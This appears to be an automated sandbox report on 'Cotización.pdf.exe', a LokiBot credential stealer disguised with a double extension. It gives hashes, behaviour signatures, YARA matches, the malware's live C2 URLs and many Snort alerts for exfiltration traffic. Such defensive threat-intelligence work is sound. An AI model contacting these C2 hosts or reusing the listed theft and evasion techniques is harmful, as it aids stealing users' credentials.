
Windows Analysis Report Cotizaci#U00f3n.pdf.exe

Overview

General Information

Sample Name: Cotizaci#U00f3n.pdf.exe
Analysis ID: 451993
MD5: c3412fee75b0f8758ea9905930ec2f34
SHA1: e9245aba2ee62a7baffbccb725bca4bc0fd0302e
SHA256: a978c99ada8c0272b0670865cdecc324d883304d54f2e90ea829891183b3aaa9
Tags: exe, Loki, lokibot

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly |
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Unpacked PEs

Source | Rule | Description | Author | Strings
12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack | Loki_1 | Loki Payload | kevoreilly |
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

System Summary:

Sigma detected: Suspicious Double Extension
Source: Process started; Author: Florian Roth (rule), @blu3_team (idea); Data: Command: {path}, CommandLine: {path}, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, NewProcessName: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe' , ParentImage: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, ParentProcessId: 3492, ProcessCommandLine: {path}, ProcessId: 6088

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: Cotizaci#U00f3n.pdf.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Cotizaci#U00f3n.pdf.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe; Code function: 12_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,12_2_00403D74

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49727 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49728 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49728 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49728 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49729 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49729 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49729 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49735 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49735 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49735 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49736 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49736 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49736 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49737 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49737 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49737 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49738 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49738 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49738 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49779 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49779 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49779 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49783 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49783 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49783 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49784 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49784 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49784 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49787 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49787 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49787 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49788 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49788 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49788 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49790 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49790 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49790 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 172.67.155.45:80
